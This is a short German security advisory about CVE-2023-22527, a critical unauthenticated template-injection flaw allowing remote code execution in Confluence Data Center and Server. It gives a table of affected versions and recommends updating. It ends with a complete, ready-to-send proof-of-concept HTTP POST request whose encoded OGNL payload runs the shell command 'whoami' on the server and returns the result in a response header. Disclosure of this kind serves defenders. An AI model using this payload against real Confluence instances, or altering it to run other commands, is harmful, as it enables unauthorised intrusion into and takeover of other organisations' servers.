
Eine Schwachstelle mit kritischem Schweregrad für Remote Code Execution (RCE) (CVE-2023-22527) wurde in Confluence Server und Data Center entdeckt.
Eine Template-Injection-Schwachstelle in älteren Versionen von Confluence Data Center und Server ermöglicht es einem nicht authentifizierten Angreifer, RCE auf einer betroffenen Instanz zu erreichen. Kunden, die eine betroffene Version verwenden, müssen sofort Maßnahmen ergreifen. Die meisten aktuell unterstützten Versionen von Confluence Data Center und Server sind von dieser Schwachstelle nicht betroffen, da sie im Rahmen regelmäßiger Versionsupdates letztendlich entschärft wurde. Atlassian empfiehlt Kunden jedoch, darauf zu achten, die neueste Version zu installieren, um ihre Instanzen vor nicht kritischen Schwachstellen zu schützen, die im Januar-Sicherheitsbulletin von Atlassian aufgeführt sind.
| Produkt | Betroffene Versionen |
|---|
| Confluence Data Center und Server | 8.0.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3 |
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29
